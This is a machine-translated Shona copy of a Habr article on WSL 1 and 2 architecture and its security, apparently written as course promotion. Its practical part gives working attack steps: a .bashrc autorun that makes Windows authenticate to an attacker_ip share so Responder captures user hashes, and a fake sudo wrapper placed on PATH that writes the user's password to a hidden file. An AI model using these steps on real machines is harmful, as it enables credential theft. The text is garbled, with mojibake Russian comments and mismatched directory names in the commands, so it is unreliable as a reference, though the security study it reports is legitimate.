Mhoro, hama! OTUS inotanga nzira itsva yekosi muna Gumiguru . Mukutarisira kutanga kwekosi, tiri kugoverana newe chinyorwa chakanyorwa nemumwe wevadzidzisi vedu, Alexander Kolesnikov.
Muna 2016, Microsoft yakaunza tekinoroji itsva yeWSL kunharaunda yeIT (Wmukati Subsystem ye Linux), iyo mune ramangwana yakaita kuti zvikwanisike kubatanidza vakwikwidzi vaimbova vasingawirirane vairwira mukurumbira pakati pevashandisi vekare uye vepamberi OS: Windows neLinux. Iyi tekinoroji yakaita kuti zvikwanise kushandisa Linux OS zvishandiso munzvimbo yeWindows pasina chikonzero chekumhanyisa Linux, semuenzaniso, kushandisa Multi-boot. PaHabr unogona kuwana nhamba huru yezvinyorwa zvinotsanangura mabhenefiti ekushandisa WSL. Zvisinei, zvinosuruvarisa, panguva yekugadzirwa kwechinyorwa ichi, hapana zvidzidzo pamusoro pekuchengetedzwa kweiyo symbiosis yemashandisirwo emashandisirwo akawanikwa pane iyi sosi. Iyi post ichave yekuedza kugadzirisa izvi. Chinyorwa chichataura nezve maficha eWSL 1 uye 2 zvivakwa uye kuongorora akati wandei mienzaniso yekurwiswa kwemasisitimu anoshandisa matekinoroji aya. Nyaya yacho yakakamurwa kuita zvikamu zviviri. Yekutanga ichapa iyo huru theoretical kurwisa nzira kubva kuLinux neWindows. Chinyorwa chechipiri chichabatanidza kumisikidza nharaunda yekuyedza uye kuberekazve kurwiswa.
WSL 1: zvivakwa zvekugadzira
Kune yakanyanya kunyura muWSL nyaya dzekuchengetedza, zvinodikanwa kuti uone iwo makuru nuances ane chekuita nekuitwa kweiyo subsystem. Rimwe remabasa makuru emushandisi anogadziriswa neWSL kugona kushanda kuburikidza neLinux terminal pane muenzi anomhanyisa Windows OS. Zvakare, kugarisana kwakapihwa kwaive kwakasikwa zvekuti Linux executables (ELFs) inogona kumhanya yakananga paWindows system. Kuti uwane izvi zvibodzwa, yakakosha subsystem yakagadzirwa mukati Windows 10 iyo inokutendera iwe kuti umhanye Linux application uchishandisa seti yeyakatarwa nharembozha - nekudaro, kuyedza kwakaitwa kumepu seti yeLinux syscalls paWindows. Izvi zvakaitwa nemuviri nekuwedzera vatyairi vatsva uye maitiro matsva efomati. Sezvineiwo architecture yaiita seizvi:
Muchokwadi, kudyidzana neLinux inoshanda sisitimu yakarongwa kuburikidza akati wandei kernel module uye yakakosha mhando yemaitiro - pico. Kubva pane dhayagiramu iri pamusoro, iwe unogona kuona kuti maitiro ari kushanda paLinux muenzaniso pane anotambira anofanira kunge ari ekuzvarwa uye anofanirwa kushandisa zviwanikwa zvakafanana neakajairika Windows application. Asi sei kuita izvi? Muchirongwa Maitiro eWindows akagadziridzwa ayo akapa zvese zvinodiwa zveiyo sisitimu yekushandisa (zvichienderana neshanduro yayo) kuti iite application yeimwe OS.
Ziva kuti kubviswa kwakarongwa kwakaita kuti zvibvirire kusatarisisa pane inoshanda sisitimu (kunyanya, Windows), umo maitiro eimwe OS anotarisirwa kuvhurwa, uye akakurudzira nzira yakajairika.
Nekudaro, chero application mukati meiyo pico process inogona kumhanya isina hanya neWindows kernel:
- Matambudziko ekuenderana uye kududzira kwehurongwa hwekufona kunofanirwa kugadziriswa nevanopa vakakosha;
- Kupinda kwekutonga kunofanirwa kuitwa kuburikidza neSecurity Monitor. Iyo yekutarisa iri mu kernel uye saka Windows yaida kukwidziridzwa muchimiro chemutyairi mutsva anogona kuita semupi wemaitiro akadaro. Iyo prototype pico process inoratidzwa schematically pazasi:
Sezvo iyo Linux file system inoshandisa kesi-sensitive faira uye mazita edhairekitori, mhando mbiri dzemafaira masisitimu akawedzerwa kuWindows kushanda neWSL - VolFS uye DriveFS. VolFS ndeyekuitwa kweLinux faira system, DriveFS ifaira system inoshanda zvinoenderana neWindows mitemo, asi ine kugona kusarudza nyaya yekunzwa.
WSL 2
WSL 1 yakanga ine zviverengero zvisingakwanisi izvo zvaisabvumira kuti ishandiswe kugadzirisa huwandu hwepamusoro hwemabasa: semuenzaniso, yakanga isingakwanisi kumhanya 32-bit Linux application, uye zvaisaita kushandisa madhiraivha emidziyo. Naizvozvo, muna 2020, WSL 2 yakaburitswa, iyo yakachinja maitiro ekuvaka subsystem. WSL 2 ndeye yakagadziridzwa chaiyo muchina unofanana nekushandisa zviwanikwa zveWSL 1. Zvino, zvichienderana nezvinetso zvinogadziriswa nemushandisi weWindows OS, unogona kusarudza inodiwa vhezheni yeLinux subsystem. Kuti kuderedze kusazvibata kunobvira, WSL 2 yakashandiswa zvichibva paHyper-V mukati Windows 10. Mune iyi fomu, Windows inokwanisa kumhanyisa Linux operating system kernel iri yoga. Zvakakodzera kuyeuka kuti vhezheni 1 yeWSL yakaunzwa senge beta ficha yaifanirwa kuratidza gwara rekuvandudza Windows munzvimbo ino, saka shanduko kuenda kuHyper-V yaive isingadzivisike. Iyo yekupedzisira architecture inoita seizvi:
Mune iyi vhezheni, iyo Windows neLinux kernels ine yavo zviwanikwa uye mharadzano iripo chete mufaira system, asi iyi mharadzano haina kukwana. Kudyidzana pakati pemafaira masisitimu kunoitwa kuburikidza nemutengi-server wrapper inoshanda uchishandisa iyo 9P protocol.
Nhasi Microsoft inopa kugona kuchinja pakati peWSL 1 neWSL 2. Mavhezheni ese ari maviri aripo kuti ashandiswe.
WSL Security
Parizvino, kune akati wandei mabasa anotsanangura dzimwe nzira dzekushandisa zviri pamutemo OS maturusi kurwisa kutaurirana pakati pe subsystems. Tichashandisa zvinyorwa zvavo kutarisa kukosha kwekurwiswa panguva yekunyora. General list yekurwisa uye mamiriro:
1. Kuitwa kwefaira hurongwa: kodzero dzekuwana, kuwanikwa kwemadhairekitori akagoverwa / nzira dzekuchinjana data.
Tsvakurudzo yakaitwa kuti ione kutyorwa kwemitemo yekuwana kubva Linux FS-> Windows FS, Windows FS-> Linux FS. Tsvagiridzo yakaratidza kugona kugadzirisa faira rakapihwa mukati meiyo OS yakanangwa. Kuedza kwakaitwawo kutsiva, kugadzira zvakapetwa uye kudzima chikamu chemafaira masisitimu.
Mamiriro ezvinhu:
- A. Attack kubva kuWindows operating system - kugadziriswa kwemafaira kubva ku /etc directory ye Linux OS.
- B. Attack kubva kuLinux operating system - kuchinjwa kwemafaira mumadhairekitori:
C:Windows,C:Program Files,C:Users<User>
2. Kuitwa kwe network stack.
Tsvagiridzo yakaitwa uchishandisa mienzaniso yekurwiswa kubva kuLinux inoshanda sisitimu paWindows. Zvimiro zvetiweki stack zvakashandiswa, zvinoti, nzira dzechokwadi pane dzakasiyana zviwanikwa.
Mamiriro ezvinhu:
- Kuvhura kupinda pachiteshi chinogarwa neWindows system
- Kuvhura chiteshi pasina kodzero dzakakodzera
- Kumhanya reverse shell uchishandisa elf faira paWindows inoshanda system.
3. Kuvanza kutangwa kwemaitiro akaipa esoftware uchishandisa WSL subsystem.
Tsvagiridzo yacho yakavakirwa pane chokwadi chiri nyore - chengetedzo subsystems haigone kubata zviitiko mune imwe kernel inoshanda uchishandisa ari pamutemo mupi kubva kune inoshanda sisitimu panyaya yeWSL 1. Panyaya yeWSL 2, hapana nzira yekuona zviitiko zvinoitika. mune imwe kernel yakaparadzana mukati meakareruka virtual muchina.
Mamiriro ezvinhu:
1) Vhura iyo application yekuwana kure kune iyo system uye tarisa iyo yakanyorwa zviitiko.
WSL 1 kuyedza: hashi kubata (Windows)
Pakupedzisira takasvika kune chikamu chekushanda. Kutanga, iwe unofanirwa kuseta nzvimbo yekuyedza. Zvese zviedzo zvichaitwa pabhenji rine Windows 10 2004 yakaiswa. Mufananidzo weUbuntu 18.04 wakasarudzwa semufananidzo wesystem yekushandisa yeWSL. Mufananidzo wacho wakasarudzwa chero, uye chero imwe ichashanda zvakafanana. Mirairo yekumisikidza stand:
Iwe unofanirwa kutanga wavhura powershell.exe semutungamiri.
Kune WSL 1 iwe unofanirwa kumhanya iyo mirairo:
- Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #ΠΠΊΠ»ΡΡΠΈΡΡ ΡΡΠ½ΠΊΡΠΈΡ WSL
- Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804
-OutFile ~/Ubuntu.appx -UseBasicParsing #ΠΠ°Π³ΡΡΠ·ΠΈΡΡ ΠΎΠ±ΡΠ°Π· Linux ΠΈΠ· ΠΌΠ°Π³Π°Π·ΠΈΠ½Π° Microsoft
Ubuntu.appx install βroot #Π£ΡΡΠ°Π½ΠΎΠ²ΠΈΠΌ ΠΎΠ±ΡΠ°Π·
ΠΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, ΠΏΡΠΈΠ΄Π΅ΡΡΡ ΠΏΡΠΎΠΊΠ»ΠΈΠΊΠ°ΡΡ ΠΏΡΠΎΡΠ΅ΡΡ Π½Π°ΡΡΡΠΎΠΉΠΊΠΈ ΠΈ ΡΠΎΠ·Π΄Π°ΡΡ Π½ΠΎΠ²ΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΊΠΎΡΠΎΡΡΠΉ Π±ΡΠ΄Π΅Ρ ΠΈΠΌΠ΅ΡΡ ΠΌΠ΅Π½ΡΡΠ΅ ΠΏΡΠ°Π², ΡΠ΅ΠΌ root. ΠΠ»Ρ Π½Π°ΡΠΈΡ
ΡΠ΅ΡΡΠΎΠ² ΡΡΠΎ Π±ΡΠ΄Π΅Ρ ΠΎΠ±ΡΡΠ½ΡΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ sam.
Restart-Computer #ΠΠ΅ΡΠ΅Π·Π°Π³ΡΡΠ·ΠΈΠΌ
Mushure mekugadzirisazve chimiro, unogona kudana iyo bash command. Kana zvese zvikashanda nemazvo, uchaona zvakabuda zvakafanana neizvi muWindows console:
Isu tichashandisa iyo Kali Linux kugovera semuchina weanorwisa; michina yese inofanirwa kunge iri pane imwecheteyo network network.
Ngatifungei isu tine mukana wekuwana WSL pamushini weWindows. Ngatiedze kurwisa iyo Linux inoshanda sisitimu nekudaidza murairo kubva kuLinux. Kuti tiite kurwiswa, isu tichashandisa yakapusa autorun maitiro - isu tichawedzera script yedu kuti tiite munzvimbo yeLinux. Kuti uite izvi unoda kuchinja faira .bashrc.
Pamuchina une WSL isu tinoita:
1. bash
2. ΠΠ΅ΡΠ΅Ρ
ΠΎΠ΄ΠΈΠΌ Π² Π΄ΠΎΠΌΠ°ΡΠ½ΡΡ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ: cd /home/sam/
2. echo Β«/home/sam/.attack.shΒ» >> .bashrc
3. echo Β«icalcs.exe Β» \\\\attacker_ip\\shareName\\Β» > /dev/null 2>&1Β» >> .attack.sh
4. chmod u+x .attack.sh
5. exitPamuchina weKali Linux tinomhanya:
1. Responder -I eth0 -rdvwPamuchina weWindows, ngatitangei bash.
Isu takamirira mhedzisiro pamushini weKali Linux:
Nekudaro, isu takawana iyo Windows mushandisi hashes kuburikidza neWSL subsystem nekuita murairo pane Linux system.
WSL 1 miedzo: kuwana mushandisi password (Linux OS)
Ngatiite imwezve kuyedza. Munguva iyi cheki tichawedzera kune faira .bashrc mirairo yakati wandei kuitira kuti uwane iyo Linux inoshanda system mushandisi password.
Ngatitangei bash uye tiise mirairo:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txtΒ» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit
Kuti ubudirire kupedzisa kurwiswa, mushandisi Sam anoda kufonera sudo muLinux terminal. Mushure meizvi, iyo Linux OS mushandisi password ichava mufaira pass.txt:
Kuitwa kwekurwiswa kwakapihwa ruzivo rwedzidziso chete.
Chikamu chinotevera chechinyorwa chinotsanangura kuitwa kwe9P protocol, funga nezvekugadzirwa kwe scanner yeiyi protocol, uye zvakare kuita kurwisa uchiishandisa.
Chinyorwa chemabhuku akashandiswa
Verenga zvimwe
Source: www.habr.com